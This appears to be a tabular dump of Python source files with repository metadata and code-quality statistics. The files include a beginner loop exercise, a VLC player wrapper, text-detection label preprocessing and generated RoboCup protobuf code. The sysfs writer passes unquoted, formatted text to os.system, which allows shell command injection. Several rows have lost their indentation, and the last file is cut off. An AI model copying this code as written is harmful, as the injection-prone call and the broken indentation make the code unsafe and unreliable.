hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | 
qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8a79c5aa4cc942ec50133c91570519a3c6638f53 | 208 | py | Python | python-hard-way/ex33.py | calebgregory/scraps | cfc0ef608db4520c1a1e22fccdbcae73dfb00e39 | [
"MIT"
] | null | null | null | python-hard-way/ex33.py | calebgregory/scraps | cfc0ef608db4520c1a1e22fccdbcae73dfb00e39 | [
"MIT"
] | null | null | null | python-hard-way/ex33.py | calebgregory/scraps | cfc0ef608db4520c1a1e22fccdbcae73dfb00e39 | [
"MIT"
] | null | null | null | def print_multiples(start, finish, inc):
    i = start
    numbers = []
    while i < finish:
        numbers.append(i)
        i = i + inc
        print "Numbers now: ", numbers
print_multiples(6,100,9)
| 16 | 40 | 0.567308 | 27 | 208 | 4.296296 | 0.518519 | 0.241379 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035211 | 0.317308 | 208 | 12 | 41 | 17.333333 | 0.78169 | 0 | 0 | 0 | 0 | 0 | 0.062802 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.375 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8a7b65e5bd38986b2df936f442af942a382962b7 | 420 | py | Python | RadioStation/Player/VLCPlayer.py | m-mohiey/AutomaticRadioStation | 9ec3935e08ef58302d314387bc107bd1be8a6418 | [
"MIT"
] | null | null | null | RadioStation/Player/VLCPlayer.py | m-mohiey/AutomaticRadioStation | 9ec3935e08ef58302d314387bc107bd1be8a6418 | [
"MIT"
] | null | null | null | RadioStation/Player/VLCPlayer.py | m-mohiey/AutomaticRadioStation | 9ec3935e08ef58302d314387bc107bd1be8a6418 | [
"MIT"
] | null | null | null | from . import AbstractPlayer
import vlc
class VLCPlayer(AbstractPlayer):
    def __init__(self):
        self.player = vlc.MediaPlayer()
        self.program = None
    def open(self, program):
        self.player.set_mrl(program.media.path)
    def play(self):
        self.player.play()
    def stop(self):
        self.player.stop()
    def wait(self):
        while self.player.is_playing():
            pass
| 18.26087 | 47 | 0.609524 | 50 | 420 | 5 | 0.5 | 0.2 | 0.168 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.280952 | 420 | 22 | 48 | 19.090909 | 0.827815 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.066667 | 0.133333 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
8a7dafa03dfd357aead512b804e640ce1f6f45ee | 737 | py | Python | bot1/engine/sysfs_writer.py | dpm76/Bot1 | a8e4f6cbc6e4f1d5f1a373a8b3c43811df6446f8 | [
"MIT"
] | null | null | null | bot1/engine/sysfs_writer.py | dpm76/Bot1 | a8e4f6cbc6e4f1d5f1a373a8b3c43811df6446f8 | [
"MIT"
] | null | null | null | bot1/engine/sysfs_writer.py | dpm76/Bot1 | a8e4f6cbc6e4f1d5f1a373a8b3c43811df6446f8 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Created on 06/04/2015
@author: david
'''
from os import system
class SysfsWriter(object):
    @staticmethod
    def writeOnce(text, path):
        '''
        writer = SysfsWriter(path)
        writer.write(text)
        writer.close()
        '''
        system("echo {0} > {1}".format(text, path))
    def __init__(self, path):
        '''
        Constructor
        '''
        self._path = path
        #self._file = open(path, "a")
    def write(self, text):
        #self._file.write(text)
        #self._file.flush()
        SysfsWriter.writeOnce(text, self._path)
    def close(self):
        #self._file.close()
        pass
| 17.139535 | 51 | 0.481682 | 73 | 737 | 4.726027 | 0.506849 | 0.092754 | 0.069565 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02407 | 0.379919 | 737 | 42 | 52 | 17.547619 | 0.730853 | 0.297151 | 0 | 0 | 0 | 0 | 0.031532 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.363636 | false | 0.090909 | 0.090909 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
8a82aa98649815d03079e4e5c9ac7d5a804f4112 | 15,091 | py | Python | Detection/AdvancedEAST/label.py | TomHacker/VTD | 3009fd53cec8a86493b5f1960e8879e5a0c7345c | [
"Apache-2.0"
] | 1 | 2020-01-01T14:38:44.000Z | 2020-01-01T14:38:44.000Z | Detection/AdvancedEAST/label.py | TomHacker/VTD | 3009fd53cec8a86493b5f1960e8879e5a0c7345c | [
"Apache-2.0"
] | null | null | null | Detection/AdvancedEAST/label.py | TomHacker/VTD | 3009fd53cec8a86493b5f1960e8879e5a0c7345c | [
"Apache-2.0"
] | 1 | 2020-01-07T12:04:33.000Z | 2020-01-07T12:04:33.000Z | import numpy as np
import os
from PIL import Image, ImageDraw
from tqdm import tqdm
from Detection.AdvancedEAST import cfg
from Detection.AdvancedEAST.preprocess import preprocess_single_image,preprocess_no_cfg
def point_inside_of_quad(px, py, quad_xy_list, p_min, p_max):
if (p_min[0] <= px <= p_max[0]) and (p_min[1] <= py <= p_max[1]):
xy_list = np.zeros((4, 2))
xy_list[:3, :] = quad_xy_list[1:4, :] - quad_xy_list[:3, :]
xy_list[3] = quad_xy_list[0, :] - quad_xy_list[3, :]
yx_list = np.zeros((4, 2))
yx_list[:, :] = quad_xy_list[:, -1:-3:-1]
a = xy_list * ([py, px] - yx_list)
b = a[:, 0] - a[:, 1]
if np.amin(b) >= 0 or np.amax(b) <= 0:
return True
else:
return False
else:
return False
def point_inside_of_nth_quad(px, py, xy_list, shrink_1, long_edge):
nth = -1
vs = [[[0, 0, 3, 3, 0], [1, 1, 2, 2, 1]],
[[0, 0, 1, 1, 0], [2, 2, 3, 3, 2]]]
for ith in range(2):
quad_xy_list = np.concatenate((
np.reshape(xy_list[vs[long_edge][ith][0]], (1, 2)),
np.reshape(shrink_1[vs[long_edge][ith][1]], (1, 2)),
np.reshape(shrink_1[vs[long_edge][ith][2]], (1, 2)),
np.reshape(xy_list[vs[long_edge][ith][3]], (1, 2))), axis=0)
p_min = np.amin(quad_xy_list, axis=0)
p_max = np.amax(quad_xy_list, axis=0)
if point_inside_of_quad(px, py, quad_xy_list, p_min, p_max):
if nth == -1:
nth = ith
else:
nth = -1
break
return nth
def shrink(xy_list, ratio=cfg.shrink_ratio):
if ratio == 0.0:
return xy_list, xy_list
diff_1to3 = xy_list[:3, :] - xy_list[1:4, :]
diff_4 = xy_list[3:4, :] - xy_list[0:1, :]
diff = np.concatenate((diff_1to3, diff_4), axis=0)
dis = np.sqrt(np.sum(np.square(diff), axis=-1))
# determine which are long or short edges
long_edge = int(np.argmax(np.sum(np.reshape(dis, (2, 2)), axis=0)))
short_edge = 1 - long_edge
# cal r length array
r = [np.minimum(dis[i], dis[(i + 1) % 4]) for i in range(4)]
# cal theta array
diff_abs = np.abs(diff)
diff_abs[:, 0] += cfg.epsilon
theta = np.arctan(diff_abs[:, 1] / diff_abs[:, 0])
# shrink two long edges
temp_new_xy_list = np.copy(xy_list)
shrink_edge(xy_list, temp_new_xy_list, long_edge, r, theta, ratio)
shrink_edge(xy_list, temp_new_xy_list, long_edge + 2, r, theta, ratio)
# shrink two short edges
new_xy_list = np.copy(temp_new_xy_list)
shrink_edge(temp_new_xy_list, new_xy_list, short_edge, r, theta, ratio)
shrink_edge(temp_new_xy_list, new_xy_list, short_edge + 2, r, theta, ratio)
return temp_new_xy_list, new_xy_list, long_edge
def shrink_edge(xy_list, new_xy_list, edge, r, theta, ratio=cfg.shrink_ratio):
if ratio == 0.0:
return
start_point = edge
end_point = (edge + 1) % 4
long_start_sign_x = np.sign(
xy_list[end_point, 0] - xy_list[start_point, 0])
new_xy_list[start_point, 0] = \
xy_list[start_point, 0] + \
long_start_sign_x * ratio * r[start_point] * np.cos(theta[start_point])
long_start_sign_y = np.sign(
xy_list[end_point, 1] - xy_list[start_point, 1])
new_xy_list[start_point, 1] = \
xy_list[start_point, 1] + \
long_start_sign_y * ratio * r[start_point] * np.sin(theta[start_point])
# long edge one, end point
long_end_sign_x = -1 * long_start_sign_x
new_xy_list[end_point, 0] = \
xy_list[end_point, 0] + \
long_end_sign_x * ratio * r[end_point] * np.cos(theta[start_point])
long_end_sign_y = -1 * long_start_sign_y
new_xy_list[end_point, 1] = \
xy_list[end_point, 1] + \
long_end_sign_y * ratio * r[end_point] * np.sin(theta[start_point])
def process_label(data_dir=cfg.data_dir):
with open(os.path.join(data_dir, cfg.val_fname), 'r') as f_val:
f_list = f_val.readlines()
with open(os.path.join(data_dir, cfg.train_fname), 'r') as f_train:
f_list.extend(f_train.readlines())
for line, _ in zip(f_list, tqdm(range(len(f_list)))):
line_cols = str(line).strip('\n').split(',')
img_name, width, height = \
line_cols[0].strip(), int(line_cols[1].strip()), \
int(line_cols[2].strip())
gt = np.zeros((height // cfg.pixel_size, width // cfg.pixel_size, 7))
train_label_dir = os.path.join(data_dir, cfg.train_label_dir_name)
xy_list_array = np.load(os.path.join(train_label_dir,
img_name.replace('.jpg','.npy')))
train_image_dir = os.path.join(data_dir, cfg.train_image_dir_name)
with Image.open(os.path.join(train_image_dir, img_name)) as im:
draw = ImageDraw.Draw(im)
for xy_list in xy_list_array:
_, shrink_xy_list, _ = shrink(xy_list, cfg.shrink_ratio)
shrink_1, _, long_edge = shrink(xy_list, cfg.shrink_side_ratio)
p_min = np.amin(shrink_xy_list, axis=0)
p_max = np.amax(shrink_xy_list, axis=0)
# floor of the float
ji_min = (p_min / cfg.pixel_size - 0.5).astype(int) - 1
# +1 for ceil of the float and +1 for include the end
ji_max = (p_max / cfg.pixel_size - 0.5).astype(int) + 3
imin = np.maximum(0, ji_min[1])
imax = np.minimum(height // cfg.pixel_size, ji_max[1])
jmin = np.maximum(0, ji_min[0])
jmax = np.minimum(width // cfg.pixel_size, ji_max[0])
for i in range(imin, imax):
for j in range(jmin, jmax):
px = (j + 0.5) * cfg.pixel_size
py = (i + 0.5) * cfg.pixel_size
if point_inside_of_quad(px, py,
shrink_xy_list, p_min, p_max):
gt[i, j, 0] = 1
line_width, line_color = 1, 'red'
ith = point_inside_of_nth_quad(px, py,
xy_list,
shrink_1,
long_edge)
vs = [[[3, 0], [1, 2]], [[0, 1], [2, 3]]]
if ith in range(2):
gt[i, j, 1] = 1
if ith == 0:
line_width, line_color = 2, 'yellow'
else:
line_width, line_color = 2, 'green'
gt[i, j, 2:3] = ith
gt[i, j, 3:5] = \
xy_list[vs[long_edge][ith][0]] - [px, py]
gt[i, j, 5:] = \
xy_list[vs[long_edge][ith][1]] - [px, py]
draw.line([(px - 0.5 * cfg.pixel_size,
py - 0.5 * cfg.pixel_size),
(px + 0.5 * cfg.pixel_size,
py - 0.5 * cfg.pixel_size),
(px + 0.5 * cfg.pixel_size,
py + 0.5 * cfg.pixel_size),
(px - 0.5 * cfg.pixel_size,
py + 0.5 * cfg.pixel_size),
(px - 0.5 * cfg.pixel_size,
py - 0.5 * cfg.pixel_size)],
width=line_width, fill=line_color)
act_image_dir = os.path.join(cfg.data_dir,
cfg.show_act_image_dir_name)
if cfg.draw_act_quad:
im.save(os.path.join(act_image_dir, img_name))
train_label_dir = os.path.join(data_dir, cfg.train_label_dir_name)
np.save(os.path.join(train_label_dir,
img_name.replace('.jpg', '_gt.npy')), gt)
def process_label_no_cfg(data_dir,shape):
print('start preprocessing......')
preprocess_no_cfg(data_dir,shape)
print('*'*100)
print('*' * 100)
print('start process labels......')
with open(os.path.join(data_dir, cfg.val_fname), 'r') as f_val:
f_list = f_val.readlines()
with open(os.path.join(data_dir, cfg.train_fname), 'r') as f_train:
f_list.extend(f_train.readlines())
for line, _ in zip(f_list, tqdm(range(len(f_list)))):
line_cols = str(line).strip('\n').split(',')
img_name, width, height = \
line_cols[0].strip(), shape, shape
gt = np.zeros((height // cfg.pixel_size, width // cfg.pixel_size, 7))
train_label_dir = os.path.join(data_dir, cfg.train_label_dir_name)
xy_list_array = np.load(os.path.join(train_label_dir,
img_name.replace('.jpg','.npy')))
train_image_dir = os.path.join(data_dir, cfg.train_image_dir_name)
with Image.open(os.path.join(train_image_dir, img_name)) as im:
draw = ImageDraw.Draw(im)
for xy_list in xy_list_array:
_, shrink_xy_list, _ = shrink(xy_list, cfg.shrink_ratio)
shrink_1, _, long_edge = shrink(xy_list, cfg.shrink_side_ratio)
p_min = np.amin(shrink_xy_list, axis=0)
p_max = np.amax(shrink_xy_list, axis=0)
# floor of the float
ji_min = (p_min / cfg.pixel_size - 0.5).astype(int) - 1
# +1 for ceil of the float and +1 for include the end
ji_max = (p_max / cfg.pixel_size - 0.5).astype(int) + 3
imin = np.maximum(0, ji_min[1])
imax = np.minimum(height // cfg.pixel_size, ji_max[1])
jmin = np.maximum(0, ji_min[0])
jmax = np.minimum(width // cfg.pixel_size, ji_max[0])
for i in range(imin, imax):
for j in range(jmin, jmax):
px = (j + 0.5) * cfg.pixel_size
py = (i + 0.5) * cfg.pixel_size
if point_inside_of_quad(px, py,
shrink_xy_list, p_min, p_max):
gt[i, j, 0] = 1
line_width, line_color = 1, 'red'
ith = point_inside_of_nth_quad(px, py,
xy_list,
shrink_1,
long_edge)
vs = [[[3, 0], [1, 2]], [[0, 1], [2, 3]]]
if ith in range(2):
gt[i, j, 1] = 1
if ith == 0:
line_width, line_color = 2, 'yellow'
else:
line_width, line_color = 2, 'green'
gt[i, j, 2:3] = ith
gt[i, j, 3:5] = \
xy_list[vs[long_edge][ith][0]] - [px, py]
gt[i, j, 5:] = \
xy_list[vs[long_edge][ith][1]] - [px, py]
draw.line([(px - 0.5 * cfg.pixel_size,
py - 0.5 * cfg.pixel_size),
(px + 0.5 * cfg.pixel_size,
py - 0.5 * cfg.pixel_size),
(px + 0.5 * cfg.pixel_size,
py + 0.5 * cfg.pixel_size),
(px - 0.5 * cfg.pixel_size,
py + 0.5 * cfg.pixel_size),
(px - 0.5 * cfg.pixel_size,
py - 0.5 * cfg.pixel_size)],
width=line_width, fill=line_color)
act_image_dir = os.path.join(cfg.data_dir,
cfg.show_act_image_dir_name)
if cfg.draw_act_quad:
im.save(os.path.join(act_image_dir, img_name))
train_label_dir = os.path.join(data_dir, cfg.train_label_dir_name)
np.save(os.path.join(train_label_dir,
img_name.replace('.jpg', '_gt.npy')), gt)
print(os.path.join(train_label_dir,
img_name.replace('.jpg', '_gt.npy'))+' Shape is{} Done!'.format(gt.shape))
def process_label_single_image(img_name,shape):
width,height=shape,shape
gt = np.zeros((height // cfg.pixel_size, width // cfg.pixel_size, 7))
resized_img,xy_list_array=preprocess_single_image(img_name)
for xy_list in xy_list_array:
_, shrink_xy_list, _ = shrink(xy_list, cfg.shrink_ratio)
shrink_1, _, long_edge = shrink(xy_list, cfg.shrink_side_ratio)
p_min = np.amin(shrink_xy_list, axis=0)
p_max = np.amax(shrink_xy_list, axis=0)
# floor of the float
ji_min = (p_min / cfg.pixel_size - 0.5).astype(int) - 1
# +1 for ceil of the float and +1 for include the end
ji_max = (p_max / cfg.pixel_size - 0.5).astype(int) + 3
imin = np.maximum(0, ji_min[1])
imax = np.minimum(height // cfg.pixel_size, ji_max[1])
jmin = np.maximum(0, ji_min[0])
jmax = np.minimum(width // cfg.pixel_size, ji_max[0])
for i in range(imin, imax):
for j in range(jmin, jmax):
px = (j + 0.5) * cfg.pixel_size
py = (i + 0.5) * cfg.pixel_size
if point_inside_of_quad(px, py,
shrink_xy_list, p_min, p_max):
gt[i, j, 0] = 1
line_width, line_color = 1, 'red'
ith = point_inside_of_nth_quad(px, py,
xy_list,
shrink_1,
long_edge)
vs = [[[3, 0], [1, 2]], [[0, 1], [2, 3]]]
if ith in range(2):
gt[i, j, 1] = 1
if ith == 0:
line_width, line_color = 2, 'yellow'
else:
line_width, line_color = 2, 'green'
gt[i, j, 2:3] = ith
gt[i, j, 3:5] = \
xy_list[vs[long_edge][ith][0]] - [px, py]
gt[i, j, 5:] = \
xy_list[vs[long_edge][ith][1]] - [px, py]
return resized_img,gt
if __name__ == '__main__':
process_label_no_cfg('E:\py_projects\data_new\data_new\data',256)
| 50.811448 | 103 | 0.477238 | 2,059 | 15,091 | 3.226323 | 0.081107 | 0.079482 | 0.079482 | 0.039139 | 0.793467 | 0.753726 | 0.729339 | 0.693964 | 0.682372 | 0.672136 | 0 | 0.03375 | 0.401166 | 15,091 | 296 | 104 | 50.983108 | 0.701339 | 0.023656 | 0 | 0.667897 | 0 | 0 | 0.014673 | 0.002513 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02583 | false | 0 | 0.02214 | 0 | 0.077491 | 0.01845 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8a8850dc06a3031c04aec4d9fd3759f0f774b453 | 157 | py | Python | tbot/utils/split.py | thomaserlang/tbot | 99cfa204d86ef35cf2cc9482ae5a44abb35b443a | [
"MIT"
] | null | null | null | tbot/utils/split.py | thomaserlang/tbot | 99cfa204d86ef35cf2cc9482ae5a44abb35b443a | [
"MIT"
] | 10 | 2022-02-14T11:40:20.000Z | 2022-03-09T22:44:03.000Z | tbot/utils/split.py | thomaserlang/tbot | 99cfa204d86ef35cf2cc9482ae5a44abb35b443a | [
"MIT"
] | 1 | 2020-09-19T16:38:24.000Z | 2020-09-19T16:38:24.000Z | import shlex
def split(s):
    if '"' not in s:
        return s.split(' ')
    try:
        return list(shlex.split(s))
    except ValueError:
pass | 17.444444 | 35 | 0.535032 | 21 | 157 | 4 | 0.666667 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.343949 | 157 | 9 | 36 | 17.444444 | 0.815534 | 0 | 0 | 0 | 0 | 0 | 0.012658 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.125 | 0.125 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
8a8995ef6b40809aa8fcabb717f831f30ee25474 | 11,530 | py | Python | Communication/messages_robocup_ssl_detection_pb2.py | MaximeGLegault/UI-Debug | f91e48cb9ffe11e78eafdd2c7a23c525d6cd6e97 | [
"MIT"
] | 2 | 2018-03-13T17:22:35.000Z | 2019-10-17T11:46:01.000Z | Communication/messages_robocup_ssl_detection_pb2.py | MaximeGLegault/UI-Debug | f91e48cb9ffe11e78eafdd2c7a23c525d6cd6e97 | [
"MIT"
] | 73 | 2016-05-30T04:52:41.000Z | 2019-06-21T03:11:49.000Z | Communication/messages_robocup_ssl_detection_pb2.py | MaximeGLegault/UI-Debug | f91e48cb9ffe11e78eafdd2c7a23c525d6cd6e97 | [
"MIT"
] | 11 | 2016-05-30T04:44:41.000Z | 2019-04-13T12:02:14.000Z | # Under MIT License, see LICENSE.txt
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: messages_robocup_ssl_detection.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='messages_robocup_ssl_detection.proto',
package='',
serialized_pb=_b('\n$messages_robocup_ssl_detection.proto\"x\n\x11SSL_DetectionBall\x12\x12\n\nconfidence\x18\x01 \x02(\x02\x12\x0c\n\x04\x61rea\x18\x02 \x01(\r\x12\t\n\x01x\x18\x03 \x02(\x02\x12\t\n\x01y\x18\x04 \x02(\x02\x12\t\n\x01z\x18\x05 \x01(\x02\x12\x0f\n\x07pixel_x\x18\x06 \x02(\x02\x12\x0f\n\x07pixel_y\x18\x07 \x02(\x02\"\x97\x01\n\x12SSL_DetectionRobot\x12\x12\n\nconfidence\x18\x01 \x02(\x02\x12\x10\n\x08robot_id\x18\x02 \x01(\r\x12\t\n\x01x\x18\x03 \x02(\x02\x12\t\n\x01y\x18\x04 \x02(\x02\x12\x13\n\x0borientation\x18\x05 \x01(\x02\x12\x0f\n\x07pixel_x\x18\x06 \x02(\x02\x12\x0f\n\x07pixel_y\x18\x07 \x02(\x02\x12\x0e\n\x06height\x18\x08 \x01(\x02\"\xd9\x01\n\x12SSL_DetectionFrame\x12\x14\n\x0c\x66rame_number\x18\x01 \x02(\r\x12\x11\n\tt_capture\x18\x02 \x02(\x01\x12\x0e\n\x06t_sent\x18\x03 \x02(\x01\x12\x11\n\tcamera_id\x18\x04 \x02(\r\x12!\n\x05\x62\x61lls\x18\x05 \x03(\x0b\x32\x12.SSL_DetectionBall\x12*\n\rrobots_yellow\x18\x06 \x03(\x0b\x32\x13.SSL_DetectionRobot\x12(\n\x0brobots_blue\x18\x07 \x03(\x0b\x32\x13.SSL_DetectionRobot')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_SSL_DETECTIONBALL = _descriptor.Descriptor(
name='SSL_DetectionBall',
full_name='SSL_DetectionBall',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='confidence', full_name='SSL_DetectionBall.confidence', index=0,
number=1, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='area', full_name='SSL_DetectionBall.area', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='x', full_name='SSL_DetectionBall.x', index=2,
number=3, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='y', full_name='SSL_DetectionBall.y', index=3,
number=4, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='z', full_name='SSL_DetectionBall.z', index=4,
number=5, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pixel_x', full_name='SSL_DetectionBall.pixel_x', index=5,
number=6, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pixel_y', full_name='SSL_DetectionBall.pixel_y', index=6,
number=7, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=40,
serialized_end=160,
)
_SSL_DETECTIONROBOT = _descriptor.Descriptor(
name='SSL_DetectionRobot',
full_name='SSL_DetectionRobot',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='confidence', full_name='SSL_DetectionRobot.confidence', index=0,
number=1, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='robot_id', full_name='SSL_DetectionRobot.robot_id', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='x', full_name='SSL_DetectionRobot.x', index=2,
number=3, type=2, cpp_type=6, label=2,
